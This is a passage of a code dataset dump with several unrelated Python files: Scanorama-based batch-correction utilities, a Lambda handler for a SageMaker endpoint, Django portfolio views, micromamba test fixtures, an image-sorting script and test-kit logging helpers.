cell'] = 'mature NK T cell'.lower()\n\tc2cnew['cd8+ t cell'] = 'CD8-positive, alpha-beta cytotoxic T cell'.lower()\n\tfin = open(marker_gene)\n\tfin.readline()\n\ttp2genes = {}\n\tunfound = set()\n\tfor line in fin:\n\t\tw = line.strip().split('\\t')\n\t\tc1 = w[1].lower()\n\t\tc2 = w[2].lower()\n\t\tgenes = []\n\t\tfor ww in w[8:]:\n\t\t\tif ww.upper() in g2i:\n\t\t\t\tgenes.append(ww.upper())\n\t\tif len(genes)==0:\n\t\t\tcontinue\n\t\tif c1.endswith('s') and c1[:-1] in name2co:\n\t\t\tc1 = c1[:-1]\n\t\tif c2.endswith('s') and c2[:-1] in name2co:\n\t\t\tc2 = c2[:-1]\n\t\tif c1 + ' cell' in name2co:\n\t\t\tc1 +=' cell'\n\t\tif c2 + ' cell' in name2co:\n\t\t\tc2 +=' cell'\n\t\tif c1 in c2cnew:\n\t\t\tc1 = c2cnew[c1]\n\t\tif c2 in c2cnew:\n\t\t\tc2 = c2cnew[c2]\n\t\tif c1 in name2co:\n\t\t\ttp2genes[name2co[c1]] = genes\n\t\telse:\n\t\t\tunfound.add(c1)\n\t\tif c2 in name2co:\n\t\t\ttp2genes[name2co[c2]] = genes\n\t\telse:\n\t\t\tunfound.add(c2)\n\tfin.close()\n\n\treturn tp2genes\n\n\ndef extend_accuracy(test_Y, test_Y_pred_vec, Y_net, unseen_l):\n\tunseen_l = set(unseen_l)\n\tn = len(test_Y)\n\tacc = 0.\n\tntmp = 0.\n\tnew_pred = []\n\tfor i in range(n):\n\t\tif test_Y[i] in unseen_l and test_Y_pred_vec[i] in unseen_l:\n\t\t\tif test_Y_pred_vec[i] in Y_net[test_Y[i]] and Y_net[test_Y[i]][test_Y_pred_vec[i]] == 1:\n\t\t\t\tacc += 1\n\t\t\t\tntmp += 1\n\t\t\t\tnew_pred.append(test_Y[i])\n\t\t\telse:\n\t\t\t\tnew_pred.append(test_Y_pred_vec[i])\n\t\telse:\n\t\t\tif test_Y[i] == test_Y_pred_vec[i]:\n\t\t\t\tacc += 1\n\t\t\tnew_pred.append(test_Y_pred_vec[i])\n\tnew_pred = np.array(new_pred)\n\treturn acc/n, new_pred\n\n\ndef run_scanorama_multiply_datasets(datasets, genes, scan_dim = 100):\n\tsparse_datasets = []\n\tfor dataset in datasets:\n\t\tsparse_datasets.append(sparse.csr_matrix(dataset))\n\tdatasets, genes = merge_datasets(sparse_datasets, genes)\n\tdatasets_dimred, genes = process_data(datasets, genes, dimred=scan_dim)\n\tdatasets_dimred, sparse_dataset_correct = my_assemble(datasets_dimred, expr_datasets = datasets, sigma=150)\n\tdataset_correct = []\n\tfor sp in sparse_dataset_correct:\n\t\tdataset_correct.append(np.power(sp.todense(), 2))\n\treturn datasets_dimred, dataset_correct\n\n\ndef run_scanorama_same_genes(features, batch_labels, scan_dim = 100):\n\tbatchs = np.unique(batch_labels)\n\tnbatch = len(batchs)\n\tif nbatch == 1:\n\t\treturn features\n\tncell, ngene = np.shape(features)\n\tassert(ncell == len(batch_labels))\n\tgenes = []\n\tdatasets = []\n\tindexs = []\n\tfor i in range(nbatch):\n\t\tgenes.append(np.array(range(ngene)))\n\t\tindex = np.where(batch_labels == batchs[i])[0]\n\t\tdataset = features[index,:]\n\t\tprint (batchs[i], np.shape(dataset))\n\t\tdatasets.append(dataset)\n\t\tindexs.append(index)\n\t_, dataset_correct = run_scanorama_multiply_datasets(datasets, genes, scan_dim = scan_dim)\n\tassert(len(dataset_correct)) == nbatch\n\tfor i in range(nbatch):\n\t\tfeatures[indexs[i],:] = dataset_correct[i]\n\treturn features\n\n\ndef my_assemble(datasets, verbose=VERBOSE, view_match=False, knn=KNN,\n\t\t\t sigma=SIGMA, approx=APPROX, alpha=ALPHA, expr_datasets=None,\n\t\t\t ds_names=None, batch_size=None,\n\t\t\t geosketch=False, geosketch_max=20000, alignments=None, matches=None): # reimplement part of scanorama to return the corrected expression (instead of low-d vectors)\n\t#this code is copy and paste from scanorama in order to output the expression. Please check their tool and cite their paper if you used this function.\n\tif len(datasets) == 1:\n\t\treturn datasets\n\n\tif alignments is None and matches is None:\n\t\talignments, matches = find_alignments(\n\t\t\tdatasets, knn=knn, approx=approx, alpha=alpha, verbose=verbose,\n\t\t)\n\n\tds_assembled = {}\n\tpanoramas = []\n\tct = 0\n\tfor i, j in alignments:\n\t\tct += 1\n\t\tprint (ct)\n\t\tsys.stdout.flush()\n\t\tif verbose:\n\t\t\tif ds_names is None:\n\t\t\t\tprint('Processing datasets {}'.format((i, j)))\n\t\t\telse:\n\t\t\t\tprint('Processing datasets {} <=> {}'.\n\t\t\t\t\t format(ds_names[i], ds_names[j]))\n\n\t\t# Only consider a dataset a fixed amount of times.\n\t\tif not i in ds_assembled:\n\t\t\tds_assembled[i] = 0\n\t\tds_assembled[i] += 1\n\t\tif not j in ds_assembled:\n\t\t\tds_assembled[j] = 0\n\t\tds_assembled[j] += 1\n\t\tif ds_assembled[i] > 3 and ds_assembled[j] > 3:\n\t\t\tcontinue\n\n\t\t# See if datasets are involved in any current panoramas.\n\t\tpanoramas_i = [ panoramas[p] for p in range(len(panoramas))\n\t\t\t\t\t\tif i in panoramas[p] ]\n\t\tassert(len(panoramas_i) <= 1)\n\t\tpanoramas_j = [ panoramas[p] for p in range(len(panoramas))\n\t\t\t\t\t\tif j in panoramas[p] ]\n\t\tassert(len(panoramas_j) <= 1)\n\n\t\tif len(panoramas_i) == 0 and len(panoramas_j) == 0:\n\t\t\tif datasets[i].shape[0] < datasets[j].shape[0]:\n\t\t\t\ti, j = j, i\n\t\t\tpanoramas.append([ i ])\n\t\t\tpanoramas_i = [ panoramas[-1] ]\n\n\t\t# Map dataset i to panorama j.\n\t\tif len(panoramas_i) == 0:\n\t\t\tcurr_ds = datasets[i]\n\t\t\tcurr_ref = np.concatenate([ datasets[p] for p in panoramas_j[0] ])\n\n\t\t\tmatch = []\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_j[0]:\n\t\t\t\tif i < p and (i, p) in matches:\n\t\t\t\t\tmatch.extend([ (a, b + base) for a, b in matches[(i, p)] ])\n\t\t\t\telif i > p and (p, i) in matches:\n\t\t\t\t\tmatch.extend([ (b, a + base) for a, b in matches[(p, i)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\n\t\t\tds_ind = [ a for a, _ in match ]\n\t\t\tref_ind = [ b for _, b in match ]\n\n\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t batch_size=batch_size)\n\t\t\tdatasets[i] = curr_ds + bias\n\n\t\t\tif expr_datasets:\n\t\t\t\tcurr_ds = expr_datasets[i]\n\t\t\t\tcurr_ref = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t\tfor p in panoramas_j[0] ])\n\t\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind,\n\t\t\t\t\t\t\t\t sigma=sigma, cn=True, batch_size=batch_size)\n\t\t\t\texpr_datasets[i] = curr_ds + bias\n\n\t\t\tpanoramas_j[0].append(i)\n\n\t\t# Map dataset j to panorama i.\n\t\telif len(panoramas_j) == 0:\n\t\t\tcurr_ds = datasets[j]\n\t\t\tcurr_ref = np.concatenate([ datasets[p] for p in panoramas_i[0] ])\n\n\t\t\tmatch = []\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tif j < p and (j, p) in matches:\n\t\t\t\t\tmatch.extend([ (a, b + base) for a, b in matches[(j, p)] ])\n\t\t\t\telif j > p and (p, j) in matches:\n\t\t\t\t\tmatch.extend([ (b, a + base) for a, b in matches[(p, j)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\n\t\t\tds_ind = [ a for a, _ in match ]\n\t\t\tref_ind = [ b for _, b in match ]\n\n\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t batch_size=batch_size)\n\t\t\tdatasets[j] = curr_ds + bias\n\n\t\t\tif expr_datasets:\n\t\t\t\tcurr_ds = expr_datasets[j]\n\t\t\t\tcurr_ref = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t\tfor p in panoramas_i[0] ])\n\t\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t\t cn=True, batch_size=batch_size)\n\t\t\t\texpr_datasets[j] = curr_ds + bias\n\n\t\t\tpanoramas_i[0].append(j)\n\n\t\t# Merge two panoramas together.\n\t\telse:\n\t\t\tcurr_ds = np.concatenate([ datasets[p] for p in panoramas_i[0] ])\n\t\t\tcurr_ref = np.concatenate([ datasets[p] for p in panoramas_j[0] ])\n\n\t\t\t# Find base indices into each panorama.\n\t\t\tbase_i = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tif p == i: break\n\t\t\t\tbase_i += datasets[p].shape[0]\n\t\t\tbase_j = 0\n\t\t\tfor p in panoramas_j[0]:\n\t\t\t\tif p == j: break\n\t\t\t\tbase_j += datasets[p].shape[0]\n\n\t\t\t# Find matching indices.\n\t\t\tmatch = []\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tif p == i and j < p and (j, p) in matches:\n\t\t\t\t\tmatch.extend([ (b + base, a + base_j)\n\t\t\t\t\t\t\t\t for a, b in matches[(j, p)] ])\n\t\t\t\telif p == i and j > p and (p, j) in matches:\n\t\t\t\t\tmatch.extend([ (a + base, b + base_j)\n\t\t\t\t\t\t\t\t for a, b in matches[(p, j)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_j[0]:\n\t\t\t\tif p == j and i < p and (i, p) in matches:\n\t\t\t\t\tmatch.extend([ (a + base_i, b + base)\n\t\t\t\t\t\t\t\t for a, b in matches[(i, p)] ])\n\t\t\t\telif p == j and i > p and (p, i) in matches:\n\t\t\t\t\tmatch.extend([ (b + base_i, a + base)\n\t\t\t\t\t\t\t\t for a, b in matches[(p, i)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\n\t\t\tds_ind = [ a for a, _ in match ]\n\t\t\tref_ind = [ b for _, b in match ]\n\n\t\t\t# Apply transformation to entire panorama.\n\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t batch_size=batch_size)\n\t\t\tcurr_ds += bias\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tn_cells = datasets[p].shape[0]\n\t\t\t\tdatasets[p] = curr_ds[base:(base + n_cells), :]\n\t\t\t\tbase += n_cells\n\n\t\t\tif not expr_datasets is None:\n\t\t\t\tcurr_ds = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t for p in panoramas_i[0] ])\n\t\t\t\tcurr_ref = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t\tfor p in panoramas_j[0] ])\n\t\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind,\n\t\t\t\t\t\t\t\t sigma=sigma, cn=True, batch_size=batch_size)\n\t\t\t\tcurr_ds += bias\n\t\t\t\tbase = 0\n\t\t\t\tfor p in panoramas_i[0]:\n\t\t\t\t\tn_cells = expr_datasets[p].shape[0]\n\t\t\t\t\texpr_datasets[p] = curr_ds[base:(base + n_cells), :]\n\t\t\t\t\tbase += n_cells\n\n\t\t\t# Merge panoramas i and j and delete one.\n\t\t\tif panoramas_i[0] != panoramas_j[0]:\n\t\t\t\tpanoramas_i[0] += panoramas_j[0]\n\t\t\t\tpanoramas.remove(panoramas_j[0])\n\n\t\t# Visualize.\n\t\tif view_match:\n\t\t\tplot_mapping(curr_ds, curr_ref, ds_ind, ref_ind)\n\n\treturn datasets, expr_datasets\n","sub_path":"OnClassTorch/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":62202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"133247710","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\n\n\ndef chi_square(query_feature, match_feature) -> float:\n \"\"\"\n 卡方校验\n :param query_feature: 搜索图像\n :param match_feature: 匹配图像\n :return: 卡方距离\n \"\"\"\n\n distance = 0.5 * np.sum(\n [((a - b) ** 2) / (a + b + 1e-10)\n for (a, b) in zip(match_feature, query_feature)]\n )\n return float(distance)\n\n\n","sub_path":"hsv_image_search/mlibs/image_match.py","file_name":"image_match.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599806085","text":"import io\nimport boto3\nimport json\nimport csv\nimport numpy as np\nimport requests as req\n\n# grab environment variables\nENDPOINT_NAME = \"DEMO-linear-endpoint-201904200249\"\nruntime = boto3.client('runtime.sagemaker')\n\n\ndef lambda_handler(event, context):\n statusCode = 200\n predicted_label = \"\"\n try:\n s = \"GET\" if event[\"httpMethod\"] == \"GET\" else \"POST\"\n data = json.loads(json.dumps(event))\n payload = data['data']\n\n response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,\n ContentType='text/csv',\n Body=\",\".join(payload))\n print(response)\n result = json.loads(response['Body'].read().decode())\n print(result)\n test_pred = np.array([r['score'] for r in result['predictions']])\n test_pred_class = (test_pred > 0.5) + 0;\n pred = int(test_pred_class[0])\n predicted_label = 'M' if pred == 1 else 'B'\n except KeyError:\n s = \"Bad\"\n statusCode = 400\n\n d = {\n \"status\": statusCode,\n \"Message\": \"That was a {} request\".format(s),\n \"event\": \"\"\n }\n if statusCode == 200:\n d[\"label\"] = predicted_label\n return d\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"210775302","text":"from selve.utils import *\nfrom selve.communication import *\nimport logging\n_LOGGER = logging.getLogger(__name__)\n\nclass Group():\n ## A group consists of multiple devices. We have to treat it like a device.\n\n def __init__(self, gateway, ID, communicationType, discover = False):\n self.ID = ID\n self.gateway = gateway\n self.mask = singlemask(ID)\n self.device_type = DeviceType.UNKNOWN ## Device type according to devices in group\n self.communicationType = communicationType\n self.name = \"Not defined\"\n if discover:\n self.discover_properties()\n \n def executeCommand(self, commandType, automatic = False):\n if automatic:\n command = CommeoDeviceCommand(self.mask, commandType)\n else:\n command = CommeoDeviceCommand(self.mask, commandType)\n command.execute(self.gateway)\n return command\n\n # def discover_properties(self):\n # command = CommeoDeviceGetValues(self.ID)\n # command.execute(self.gateway)\n # self.device_type = command.deviceType\n # self.name = command.name\n\n ## Actor ##\n\n\n ## Sensor ##\n\n\n ## SenSim ##\n\n\n ## Sender ##\n\n\n ## Iveo ##\n\n\n \n\n \n def __str__(self):\n return \"Device \" + self.device_type.name + \" of type: \" + self.communicationType + \" on channel \" + str(self.ID) + \" with name \" + self.name","sub_path":"selve/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"165599986","text":"from datetime import datetime, timedelta\nfrom src.models import RouteMetrics\nfrom src.queries.get_route_metrics import get_route_metrics\n\n\ndef test_get_route_metrics(db_mock):\n \"\"\"Tests that the route metrics are queried correctly from db data\"\"\"\n\n date = datetime.utcnow().replace(minute=0, second=0, microsecond=0)\n before_all_date = (date + timedelta(hours=-2))\n before_date = (date + timedelta(hours=-1))\n\n route_metrics = [{\n 'version': '1',\n 'route_path': 'tracks/some_hash',\n 'query_string': '',\n 'count': 3,\n 'timestamp': before_date\n }, {\n 'version': '1',\n 'route_path': 'tracks/some_hash',\n 'query_string': 'with_users=true',\n 'count': 2,\n 'timestamp': before_date\n }]\n\n RouteMetrics.__table__.create(db_mock._engine)\n\n # Set up db state\n with db_mock.scoped_session() as session:\n route_metric_obj = [RouteMetrics(\n version=metric['version'],\n route_path=metric['route_path'],\n query_string=metric['query_string'],\n count=metric['count'],\n timestamp=metric['timestamp']\n ) for metric in route_metrics]\n\n session.bulk_save_objects(route_metric_obj)\n\n args_1 = {\n 'limit': 10,\n 'start_time': before_all_date,\n 'path': 'tracks/some_hash'\n }\n metrics_1 = get_route_metrics(args_1)\n\n assert len(metrics_1) == 1\n assert metrics_1[0]['count'] == 5\n\n args_2 = {\n 'limit': 10,\n 'start_time': before_all_date,\n 'path': 'tracks/some_hash',\n 'query_string': 'with_users=true'\n }\n metrics_2 = get_route_metrics(args_2)\n\n assert len(metrics_2) == 1\n assert metrics_2[0]['count'] == 2\n\n args_3 = {\n 'limit': 10,\n 'start_time': before_all_date,\n 'path': 'tracks/some_hash',\n 'query_string': 'with_users=WRONG'\n }\n metrics_3 = get_route_metrics(args_3)\n\n assert not metrics_3\n","sub_path":"discovery-provider/src/queries/get_route_metrics_test.py","file_name":"get_route_metrics_test.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"318914457","text":"import os\nimport pathlib\nimport platform\nfrom typing import Generator\n\nimport pytest\n\nfrom . import helpers\n\n\n@pytest.fixture\ndef tmp_home(tmp_path: pathlib.Path) -> Generator[pathlib.Path, None, None]:\n \"\"\"Change the home directory to a tmp folder for the duration of a test.\"\"\"\n # Try multiple combination for Unix/Windows\n home_envs = [\"HOME\", \"USERPROFILE\"]\n old_homes = {name: os.environ.get(name) for name in home_envs}\n\n if len(home_envs) > 0:\n new_home = tmp_path / \"home\"\n new_home.mkdir(parents=True, exist_ok=True)\n for env in home_envs:\n os.environ[env] = str(new_home)\n yield new_home\n for env, home in old_homes.items():\n if old_homes[env] is None:\n del os.environ[env]\n else:\n os.environ[env] = home\n else:\n yield pathlib.Path.home()\n\n\n@pytest.fixture(scope=\"session\")\ndef tmp_pkgs_dirs(tmp_path_factory: pytest.TempPathFactory) -> pathlib.Path:\n \"\"\"A common package cache for mamba downloads.\n\n The directory is not used automatically when calling this fixture.\n \"\"\"\n return tmp_path_factory.mktemp(\"pkgs_dirs\")\n\n\n@pytest.fixture(params=[False])\ndef shared_pkgs_dirs(request) -> bool:\n \"\"\"A dummy fixture to control the use of shared package dir.\"\"\"\n return request.param\n\n\n@pytest.fixture\ndef tmp_clean_env(\n tmp_pkgs_dirs: pathlib.Path, shared_pkgs_dirs: bool\n) -> Generator[None, None, None]:\n \"\"\"Remove all Conda/Mamba activation artifacts from environment.\"\"\"\n saved_environ = {}\n for k, v in os.environ.items():\n if k.startswith((\"CONDA\", \"_CONDA\", \"MAMBA\", \"_MAMBA\")):\n saved_environ[k] = v\n del os.environ[k]\n\n def keep_in_path(\n p: str, prefix: str | None = saved_environ.get(\"CONDA_PREFIX\")\n ) -> bool:\n if \"condabin\" in p:\n return False\n # On windows, PATH is also used for dyanamic libraries.\n if (prefix is not None) and (platform.system() != \"Windows\"):\n p = str(pathlib.Path(p).expanduser().resolve())\n prefix = str(pathlib.Path(prefix).expanduser().resolve())\n return not p.startswith(prefix)\n return True\n\n path_list = os.environ[\"PATH\"].split(os.pathsep)\n path_list = [p for p in path_list if keep_in_path(p)]\n os.environ[\"PATH\"] = os.pathsep.join(path_list)\n\n if shared_pkgs_dirs:\n os.environ[\"CONDA_PKGS_DIRS\"] = str(tmp_pkgs_dirs)\n\n yield None\n\n os.environ.update(saved_environ)\n\n\n@pytest.fixture(params=[helpers.random_string, \"long_prefix_\" * 20])\ndef tmp_env_name(request) -> str:\n \"\"\"Return the explicit or implicit parametrization.\"\"\"\n if callable(request.param):\n return request.param()\n return request.param\n\n\n@pytest.fixture\ndef tmp_root_prefix(\n tmp_path: pathlib.Path, tmp_clean_env: None\n) -> Generator[pathlib.Path, None, None]:\n \"\"\"Change the micromamba root directory to a tmp folder for the duration of a test.\"\"\"\n old_root_prefix = os.environ.get(\"MAMBA_ROOT_PREFIX\")\n new_root_prefix = tmp_path / \"mamba\"\n new_root_prefix.mkdir(parents=True, exist_ok=True)\n os.environ[\"MAMBA_ROOT_PREFIX\"] = str(new_root_prefix)\n yield new_root_prefix\n if old_root_prefix is not None:\n os.environ[\"MAMBA_ROOT_PREFIX\"] = old_root_prefix\n else:\n del os.environ[\"MAMBA_ROOT_PREFIX\"]\n\n\n@pytest.fixture\ndef tmp_empty_env(\n tmp_root_prefix: pathlib.Path, tmp_env_name: str\n) -> Generator[pathlib.Path, None, None]:\n \"\"\"An empty envirnment created under a temporary root prefix.\"\"\"\n helpers.create(\"-n\", tmp_env_name, no_dry_run=True)\n yield tmp_root_prefix\n\n\n@pytest.fixture\ndef tmp_prefix(\n tmp_root_prefix: pathlib.Path, tmp_env_name: str\n) -> Generator[pathlib.Path, None, None]:\n \"\"\"Change the conda prefix to a tmp folder for the duration of a test.\"\"\"\n old_prefix = os.environ.get(\"CONDA_PREFIX\")\n new_prefix = tmp_root_prefix / \"envs\" / tmp_env_name\n new_prefix.mkdir(parents=True, exist_ok=True)\n os.environ[\"CONDA_PREFIX\"] = str(new_prefix)\n yield new_prefix\n if old_prefix is not None:\n os.environ[\"CONDA_PREFIX\"] = old_prefix\n else:\n del os.environ[\"CONDA_PREFIX\"]\n","sub_path":"micromamba/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576119080","text":"from django.db.models.fields import files\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.shortcuts import redirect, render , get_object_or_404\r\nfrom django.contrib.auth.models import User\r\nfrom .models import Profile , Project\r\nfrom portfolio.forms import ProfileForm , ProjectForm\r\n\r\n# Create your views here.\r\ndef indexpage(request):\r\n\r\n users = User.objects.all().order_by('-date_joined')\r\n\r\n context = {'users': users}\r\n return render(request, 'index.html' ,context)\r\n\r\n\r\ndef dashboard(request):\r\n return render(request, 'dashboard.html')\r\n\r\ndef detail_profil(request, id=None):\r\n user = get_object_or_404(User, id=id)\r\n profile = get_object_or_404(Profile, user=user)\r\n context = {'profile': profile }\r\n return render(request, 'profil.html' ,context)\r\n\r\n#eseye jwenn yon solution poum ka fe user lan we projet li yo\r\ndef InfosPage(request):\r\n \r\n return render(request, 'infos.html')\r\n\r\n# sa se pou lhr moun nan se yon user \r\n# yon user ki konekte\r\n@login_required(login_url='authentificate')\r\ndef viewByUser(request):\r\n mypros = request.user.projects.all()\r\n\r\n context = {'mypros': mypros}\r\n return render(request, 'template_project.html', context)\r\n\r\n@login_required(login_url='authentificate')\r\ndef deleteProj(request, id=None):\r\n\r\n Project.objects.get(id=id).delete()\r\n return redirect(\"dash\")\r\n\r\n\r\n\r\n# sa se pou lhr moun nan pa yon user \r\n# men li ka toujou we project yon \r\ndef detail_project(request, id=None):\r\n project = get_object_or_404(Project, id=id)\r\n context = {'project': project}\r\n return render(request, 'project.html', context)\r\n\r\n@login_required(login_url='authentificate')\r\ndef newProfile(request):\r\n\r\n if request.method == \"POST\":\r\n myprofil = ProfileForm(data=request.POST, files=request.FILES)\r\n if myprofil.is_valid: # si profil lan valid\r\n mypro = request.user.profile\r\n mypro.name = request.POST.get(\"name\")\r\n mypro.last_name = request.POST.get(\"last_name\")\r\n mypro.email = request.POST.get(\"email\")\r\n mypro.photo = request.FILES.get(\"photo\")\r\n mypro.phone = request.POST.get(\"phone\")\r\n mypro.save()\r\n return redirect(\"dash\")\r\n \r\n else:\r\n print(\"profile ou an pa ajoute patiza\")\r\n else:\r\n myprofil = ProfileForm()\r\n context = {'myprofil': myprofil}\r\n return render(request, 'my_profile.html', context)\r\n\r\n@login_required(login_url=\"authentificate\")\r\ndef newProjects(request):\r\n if request.method == \"POST\":\r\n myprojects = ProjectForm(data=request.POST, files=request.FILES)\r\n if myprojects.is_valid():\r\n myprojects.cleaned_data.get('category')\r\n myprojects.cleaned_data.get('title')\r\n myprojects.cleaned_data.get('description')\r\n myprojects.cleaned_data.get('photo')\r\n \r\n mypro = myprojects.save(commit=False)\r\n mypro.user = request.user\r\n mypro.save()\r\n\r\n myprojects.save_m2m()\r\n #projects.category.add(category)\r\n \r\n\r\n return redirect(\"dash\")\r\n else:\r\n print(\"project w lan pa ajoute nan base de donne an patizan\")\r\n \r\n else:\r\n myprojects = ProjectForm()\r\n context = {'myprojects': myprojects}\r\n return render(request, 'allprojects.html', context)\r\n\r\n\r\n\r\n","sub_path":"platfom/portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"205370048","text":"import os\nimport csv\nimport shutil\nimport cv2 as cv\nimport math\n\nTEST_FRACTION = 0.1\n\nimages_path = input('Training images folder path (must end with /): ')\ncsv_path = input('Training ground truth table .csv file path: ')\n\ntrain_output_path = '../data/task2/training_sorted_resized'\ntest_outputh_path = '../data/task2/testing_sorted_resized'\n\nos.makedirs(train_output_path)\nos.makedirs(test_outputh_path)\n\nclasses = ['Melanoma', 'Melanocytic_Nevus', 'Basal_Cell_Carcinoma', 'Actinic_Keratosis', 'Benign_Keratosis', 'Dermatofibroma', 'Vascular_Lesion']\n\nfor class_name in classes:\n os.makedirs(train_output_path + '/' + class_name)\n os.makedirs(test_outputh_path + '/' + class_name)\n\nwith open(csv_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n\n csv_reader.__next__()\n\n for row in csv_reader:\n img_name = row[0] + '.jpg'\n \n img_path = images_path + img_name\n img = cv.imread(img_path)\n print(img_path)\n resized_img = cv.resize(img, (224, 224), interpolation = cv.INTER_AREA)\n\n j = 1\n\n for j in range(1, len(row)):\n if row[j] == '1.0':\n classification = row[1]\n break\n \n print(train_output_path + '/' + classes[j - 1])\n cv.imwrite(train_output_path + '/' + classes[j - 1] + '/' + img_name, resized_img)\n\nfor directory in os.listdir(train_output_path):\n train_sub_directory = os.path.join(train_output_path, directory)\n test_sub_directory = os.path.join(test_outputh_path, directory)\n\n for _, _, images in os.walk(train_sub_directory):\n total_images = len(images)\n test_images_no = math.floor(total_images * TEST_FRACTION)\n\n for i in range(test_images_no):\n shutil.move(os.path.join(train_sub_directory, images[i]), os.path.join(test_sub_directory, images[i]))","sub_path":"src/group_images_task_2.py","file_name":"group_images_task_2.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"174067881","text":"import logging\nimport json\n\nfrom keywords.exceptions import FeatureSupportedError\nfrom utilities.cluster_config_utils import get_cbs_servers, get_sg_version\n\n\n# TODO: Use python logging hooks instead of wrappers - https://github.com/couchbaselabs/mobile-testkit/issues/686\ndef log_info(message, is_verify=False):\n # pytest will capture stdout / stderr\n # by using 'print' the html reporting and running the test with -s will pick up this output in the console\n # If verify is true, the message will have the format \" > This is some message\" for cleaner output\n\n if is_verify:\n message = \" > {}\".format(message)\n\n print(message)\n logging.info(message)\n\n\ndef log_section():\n output = \"----------------\"\n print(output)\n logging.info(output)\n\n\ndef log_debug(message):\n \"\"\"Wrapper around logging.debug if we want to add hooks in the future.\"\"\"\n logging.debug(message)\n\n\ndef log_error(message):\n \"\"\"Wrapper around logging.error if we want to add hooks in the future.\"\"\"\n print(message)\n logging.error(message)\n\n\ndef log_warn(message):\n \"\"\"Wrapper around logging.warn if we want to add hooks in the future.\"\"\"\n print(message)\n logging.warn(message)\n\n\ndef log_r(request, info=True):\n request_summary = \"{0} {1} {2}\".format(\n request.request.method,\n request.request.url,\n request.status_code\n )\n\n if info:\n log_info(request_summary)\n\n logging.debug(\"{0} {1}\\nHEADERS = {2}\\nBODY = {3}\".format(\n request.request.method,\n request.request.url,\n request.request.headers,\n request.request.body))\n\n logging.debug(\"{}\".format(request.text))\n\n\ndef version_is_binary(version):\n if len(version.split(\".\")) > 1:\n # ex 1.2.1 or 1.2.1-4\n return True\n else:\n return False\n\n\ndef version_and_build(full_version):\n version_parts = full_version.split(\"-\")\n assert len(version_parts) == 2\n return version_parts[0], version_parts[1]\n\n\ndef host_for_url(url):\n \"\"\" Takes a url in the form of http://192.168.33.10:4985\n and returns an host in the form 192.168.33.10\n \"\"\"\n\n if \"https\" in url:\n host = url.replace(\"https://\", \"\")\n else:\n host = url.replace(\"http://\", \"\")\n\n host = host.split(\":\")[0]\n log_info(\"Extracted host ({}) from url ({})\".format(host, url))\n\n return host\n\n\n# Targeted playbooks need to use the host_name (i.e. sg1)\ndef hostname_for_url(cluster_config, url):\n cluster_config = \"{}.json\".format(cluster_config)\n with open(cluster_config) as f:\n logging.info(\"Using cluster config: {}\".format(cluster_config))\n cluster = json.loads(f.read())\n\n logging.debug(cluster)\n\n # strip possible ports\n url = url.replace(\"http://\", \"\")\n url = url.replace(\":4984\", \"\")\n url = url.replace(\":4985\", \"\")\n url = url.replace(\":8091\", \"\")\n\n endpoints = cluster[\"sg_accels\"]\n endpoints.extend(cluster[\"sync_gateways\"])\n endpoints.extend(cluster[\"couchbase_servers\"])\n endpoints.extend(cluster[\"load_balancers\"])\n\n logging.debug(endpoints)\n\n for endpoint in endpoints:\n if endpoint[\"ip\"] == url:\n logging.info(\"Name found for url: {}. Returning: {}\".format(url, endpoint[\"name\"]))\n return endpoint[\"name\"]\n\n raise ValueError(\"Could not find name for url: {} in cluster_config: {}\".format(url, cluster_config))\n\n\ndef dump_file_contents_to_logs(filename):\n try:\n log_info(\"Contents of {}: {}\".format(filename, open(filename).read()))\n except Exception as e:\n log_info(\"Error reading {}: {}\".format(filename, e))\n\n\n# Check if this version has net45\ndef has_dot_net4_dot_5(version):\n version_prefixes = [\n \"1.2\",\n \"1.3\",\n \"1.4.0\" # For 1.4, the path is 